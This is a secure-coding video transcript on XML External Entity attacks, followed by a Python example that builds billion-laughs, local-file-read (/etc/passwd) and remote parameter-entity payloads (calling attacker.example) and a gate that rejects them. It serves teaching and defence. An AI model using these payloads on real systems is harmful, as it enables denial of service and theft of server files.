XXE Vulnerability Introduction

Video Transcription
00:00
Hello. My name is [inaudible]. Welcome to this overview of secure coding.
00:05
XML External Entity vulnerability is actually number four on the OWASP Top Ten vulnerabilities of 2017, which is the latest as at the time this video is being recorded. Now in this video I will be discussing the introduction, scenarios, impact, prevention, and some quiz questions.
00:23
What exactly is XML External Entity? XML is an acronym for Extensible Markup Language,
00:28
which is similar to HTML, but HTML is actually meant for data presentation on a web application, while XML is meant for the storage and transportation of data between applications. Now, this is a simple format for an XML file. Here we have the version,
00:47
then here we have the DTD, which is the Document Type
00:52
Definition. So the Document Type Definition simply specifies the validity of the body of the XML, and this is the body of the XML itself. Now, in this DTD an attacker can actually put some content like what you have here,
01:07
to either read some configurations or steal other kinds of information. So that is the DTD. Now here you have the body of the XML;
01:18
this is your opening tag and this is the closing tag; the difference between the opening tag and the closing tag is this forward slash. That's it. Then another thing that may be of interest to you is that the major difference between XML here and the actual HTML is just that here you can use custom tags,
01:37
like this one here: 'note'.
01:38
I can change it to 'my need'; this one, I can change it to 'its orbit'; I can change it to my name or any other thing. So in essence, you don't have to use standard tags that have been defined. That's a simple introduction to XML.
01:56
Now, if an attacker has the opportunity of uploading an XML file to the server, the simplest case is the opportunity to upload XML files with hostile content, where they put the hostile content inside the DTD that I showed you earlier; it is already there. Once the attacker uploads the hostile content
02:13
and the server has parsed the hostile content, it can actually cause denial of service, in which several strings are generated on the server,
02:22
and it gets to a point where the server can no longer respond to any request; the server simply shuts down. So legitimate users who are meant to access the server for one or two services will not be able to, because the service has been denied.
02:38
That's what I mean by denial of service. Then, disclosure of confidential information, which might be top-secret information.
02:45
The attacker uploads the hostile content on your server, and such information will be revealed, giving the attacker a view of your network for further information. So what are the actual causes of this XML External Entity?
03:00
One of them is using old XML processors that are not capable of dealing with this hostile content. Another is when you have poorly written XML parsers; XML parsers are also XML processors which are written in a particular language. So if you write an XML parser,
03:19
even though you've written it in a modern language, and it is incapable of dealing with this hostile content, then
03:24
such an application will be exploited. So we'll take a look at two scenarios of exploitation: one is disclosure of sensitive information or data, the other is denial of service, which we call 'billion laughs' in this case. So let's take a look at the
03:44
application.
03:46
The web app is called [inaudible]. So here, if it's your first time, you click this and go to Sign Up, but because I've set up my account already, I'm going straight to logging in. So, user one, then one two three.
04:00
I'm now logged in. This is the dashboard where you can actually perform those attacks. Now here we have XML External Entity, and the first one is
04:13
DoS, which is the billion laughs attack. So in this case, you're going to upload an XML file. I'm going to show you some XML file samples.
04:20
The output you see on the dashboard
04:24
is going to be
04:27
brought forward. Now, here we have these XML files.
04:33
Yeah, this is a file that can cause DoS. When you open it up, this is the start;
04:40
you're going to see, yeah, this is the entity which I told you earlier that attackers actually exploit. Now here you have, which is what? Something here is defined, and the repetition like the one here means repetition of that entity in several places,
04:59
and by itself it is repeated. So this, like a geometric progression, is like
05:02
two raised to a power. The same thing is applicable here, and here we have another one, which means that the bug is going to be repeated; all of these, through something raised to a power, will be repeated all over the place, especially on the server, and once it gets to a point that it exceeds the
05:23
memory capacity of the server, the server is simply going to crash.
05:26
So it's as simple as that. Now let's take a look at this: this is the normal XML body. If you look at the bomb, the bad entity has been called, and as we called it, it can be called in several places so that several strings will be written on the server, and it gets to the point that it's well over the
05:45
server's capacity, and the server just shuts down,
05:47
in the process denying the legitimate users
05:51
services on the server. So let's see how this works in this case. It says 'upload your file'; it says only XML is the acceptable format. So I'm going to browse, and you can see here, this is the DoS file. You can name it whatever you decide to.
06:11
That's one thing.
06:13
Now, even before I upload the DoS file, let's upload this file called 'good boy'. Let's take a look at what the content of the good boy looks like. The good boy contains a normal XML file;
06:28
it contains normal client credit information: ID, bank, credit card, balance, bill, phone, address, and all of that. So let's try to upload.
06:40
In this case, I'll also upload good boy,
06:44
which is expected to be harmless.
06:46
So I've uploaded it and it says 'successful'. So here, this part is the admin side, I mean the admin console. What has been uploaded from the front end comes to the back end, and it looks for such files. So here
07:03
I have many other files that have been uploaded. The admin comes here, opens it and displays it.
07:09
You can see it has read the contents of the good boy file. So let's now go back to the front end
07:18
and upload the file that can actually cause the billion laughs attack. Here, DoS: open, and submit. You can see 'uploaded successfully'. So let's go back to the admin end.
07:32
The admin gets to work one morning and feels he needs to check the content of the file that
07:39
the [inaudible] uploaded. This is the DoS
07:43
that has been recently uploaded. So here, click 'parse', and you can see it saying
07:50
'DoS', which is denial of service: suspected server crash against the supported limit. It simply means the server got to a level that it cannot accommodate, so it just hangs. So if this were to continue... I just made it in such a way that
08:11
it can only accommodate a certain length of strings;
08:13
if I decide to make it more than this, it gets out of hand. If I decide to make it more than this, and let all those strings keep going on and on and on, it will crash my browser; it will also crash the back-end server, and that's just what happens. Now, apart from that,
08:31
that's what we call denial of service, because it simply means, when my browser crashes, when the server crashes, legitimate users will not be able to have access to the real services. Now let's take a look at the other one, which we call
08:46
sensitive data extraction on the XML entity. Here, the user is allowed to put their details in XML, and is also given the opportunity to view the content;
08:58
and this thing where they are allowed to view the content, you can upload it. So that's a dangerous opportunity for us to view top secrets,
09:07
I mean top-secret files from the server. Let's take a look at such a sample file,
09:13
which I call 'data extraction'. Yeah, that's my extraction; open it. It is also an XML file containing the normal things, but here, as everybody knows, this is where your server configuration is actually saved, for example. So this directory is where your server information,
09:33
server configuration information, is. So what he does is put it there as an entity,
09:37
and if the user is allowed to view the content, it will simply read some configuration and display it, including the password to the server, the username of the server. Let's take a look at that. This is top-secret information in this case. So let's take a look at this here:
09:58
we are going to
10:00
upload this. That's our extraction; close. It's uploaded. It says 'uploaded successfully'. So let's go back to where we can view it. So you're going to see the good boy as the first, DoS as the second, and this one is what we uploaded now, so
10:18
click it and parse. Good. If you look at it, it is very revealing, because you find out that there is some interesting information. So here, if you look at it, you can see: 'you should change this for a more secure authorization' [inaudible] authentication.
10:39
If you look, okay, you can see this is 'user', the user is 'root'. So that means I'm not changing this; this is the default, so the user is root. If you go further, this is 'password' here; this is where the password is meant to be. The password is empty, I mean, just an empty string.
10:56
If that's how you have the details of your server, then it would simply be very easy for you
11:01
to actually hack into such a server. So that is just what the disclosure of sensitive information and the billion laughs attack look like. So what impact of XML External Entity have we just discussed?
11:18
We have been able to carry out data extraction; we have been able to see
11:24
DoS, which is denial of service, and we have been able to see information disclosure. So in what ways can you actually prevent XML External Entity? One is for you to prevent the use of XML; it's better to use JSON for data representation. So JSON is
11:41
JavaScript Object Notation. Then the other one is
11:45
weak XML processors: if you are using an XML processor that still processes the DTD, or that does not know what to do with poisonous content, then you have to discard it or upgrade it so it can handle such.
12:00
Then another one is for you to disable your DTD processing; it depends on the platform you're using.
12:05
There is one for when you write a Java application; you are probably going to see that in some other kind of classes on which the term applies. Then you also have validating incoming XML files; they might use whitelisting or blacklisting. Here it is just going to show you the list of
12:24
things that are going to be permitted, I guess, and parse them.
12:26
So that's it; let's take a look at some quiz questions. Which of the following is not true about XML? It is machine readable; it is used for data storage and data representation; it is not human readable. It is actually not human readable? It is machine readable, exactly.
12:43
It is meant for data storage.
12:46
It is meant for data representation. It is also human readable. So saying 'not human readable' is what is not true; so that's the answer to that question. XXE, which is XML External Entity, can be prevented how? By disabling the DTD, using weak parsers,
13:03
using new processors, or loss of data. The answer is disabling the DTD: once you disable the DTD, XXE can be prevented. So in summary, we discussed XML as a data representation; as an attack scenario, an attacker can upload an XML file with some poisonous settings
13:24
in the DTD to steal information.
13:26
We've also said weak parsers can actually cause such exploitation, and a scenario is DoS, which is denial of service, and I've shown you an impact where you can disclose confidential information, especially server authorization files or server configuration secrets,
13:43
and you can prevent it by disabling the DTD. So JSON is actually considered the best choice for data representation, so for new applications, I believe,
13:52
use JSON format; for legacy applications, you need to strengthen your XML parser.
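The following is an added example written for this page; it is not code from the video or its lab application. It shows, in Python, the two payload shapes the video demonstrates (an entity-expansion "billion laughs" bomb and a SYSTEM entity pointing at a server file) and a pre-parse gate of the kind the prevention section recommends: the upload is inspected for DTD entity declarations before any XML parser touches it, external and parameter entities are rejected outright, and the size that internal entities would expand to is computed statically and compared against a limit. All payloads are constructed here for illustration, the 10,000-character expansion limit is an arbitrary policy value, and the attacker host in the parameter-entity sample is a placeholder. The gate is a belt-and-braces check: the primary fix remains configuring the parser itself to not process DTDs (for example `lxml.etree.XMLParser(resolve_entities=False)`), and Python's bundled expat-based parsers do not fetch external entities on their own; the gate makes the policy explicit and logged regardless of which parser the service ends up using.

```python
"""Pre-parse gate against XXE and entity-expansion (billion laughs) uploads.

Added example for this page; not the video's lab code. Sample documents below
are constructed for illustration only.
"""
import re
import xml.etree.ElementTree as ET

# Constructed sample: internal-entity bomb (each level references the previous ten times).
BILLION_LAUGHS = """<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
]>
<lolz>&lol4;</lolz>
"""

# Constructed sample: external entity that would read a server file into the document.
FILE_DISCLOSURE = """<?xml version="1.0"?>
<!DOCTYPE data [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data><name>&xxe;</name></data>
"""

# Constructed sample: parameter entity fetching a remote DTD (placeholder host).
OOB_PARAMETER = """<?xml version="1.0"?>
<!DOCTYPE data [
  <!ENTITY % dtd SYSTEM "http://attacker.example/evil.dtd">
  %dtd;
]>
<data/>
"""

# Constructed sample: the harmless "good boy" style upload with no DTD at all.
BENIGN = """<?xml version="1.0"?>
<customers>
  <customer><name>A. Customer</name><balance>10.00</balance></customer>
</customers>
"""

PREDEFINED = {"amp", "lt", "gt", "apos", "quot"}  # built-in entities expand to one char
DOCTYPE_RE = re.compile(r"<!DOCTYPE\s+[^\[>]*(?:\[(.*?)\])?\s*>", re.DOTALL)
ENTITY_RE = re.compile(
    r'<!ENTITY\s+(%\s*)?(\w+)\s+(SYSTEM|PUBLIC)?\s*"([^"]*)"(?:\s*"([^"]*)")?\s*>'
)
REF_RE = re.compile(r"&(\w+);")


def entity_declarations(xml_text):
    """Return (body, {name: (kind, value)}) for the internal DTD subset.

    kind is 'internal', 'external' (SYSTEM/PUBLIC) or 'parameter' (% entity).
    body is the document text after the DOCTYPE, where general entities are referenced.
    """
    m = DOCTYPE_RE.search(xml_text)
    if not m:
        return xml_text, {}
    entities = {}
    for pct, name, ext, first, second in ENTITY_RE.findall(m.group(1) or ""):
        if pct:
            entities[name] = ("parameter", first)
        elif ext:
            # SYSTEM "uri" or PUBLIC "pubid" "uri": the URI is the last quoted string
            entities[name] = ("external", second if ext == "PUBLIC" else first)
        else:
            entities[name] = ("internal", first)
    return xml_text[m.end():], entities


def expansion_size(name, entities, _stack=()):
    """Characters produced by fully expanding &name; (recursive, cycle-safe)."""
    if name in PREDEFINED:
        return 1
    if name in _stack:
        raise ValueError(f"recursive entity &{name};")
    if name not in entities:
        raise ValueError(f"undefined entity &{name};")
    kind, value = entities[name]
    if kind != "internal":
        raise ValueError(f"{kind} entity &{name}; cannot be sized offline")
    literal = len(REF_RE.sub("", value))
    nested = sum(expansion_size(r, entities, _stack + (name,)) for r in REF_RE.findall(value))
    return literal + nested


def assess(xml_text, max_expansion=10_000):
    """Return (ok, reason). Policy limit is an arbitrary value chosen for this example."""
    body, entities = entity_declarations(xml_text)
    for name, (kind, value) in entities.items():
        if kind != "internal":
            return False, f"{kind} entity &{name}; -> {value!r}"
    try:
        total = sum(expansion_size(r, entities) for r in REF_RE.findall(body))
    except ValueError as exc:
        return False, str(exc)
    if total > max_expansion:
        return False, f"entity expansion of {total} chars exceeds {max_expansion}"
    return True, f"ok (expansion {total} chars)"


def parse_safely(xml_text, max_expansion=10_000):
    """Parse only uploads that pass the gate; raise ValueError with the reason otherwise."""
    ok, reason = assess(xml_text, max_expansion)
    if not ok:
        raise ValueError(f"rejected XML upload: {reason}")
    return ET.fromstring(xml_text)


if __name__ == "__main__":
    samples = [("billion laughs", BILLION_LAUGHS), ("file disclosure", FILE_DISCLOSURE),
               ("oob parameter", OOB_PARAMETER), ("benign", BENIGN)]
    for label, doc in samples:
        print(f"{label:16} -> {assess(doc)}")
```

Run it to see the four verdicts; only the benign customer record reaches `ET.fromstring`. The expansion estimate is what makes the DoS case visible before parsing: four levels of ten references to a three-character entity already expand to 30,000 characters, and each extra level multiplies that by ten, which is why the server in the video stops responding once the bomb is parsed.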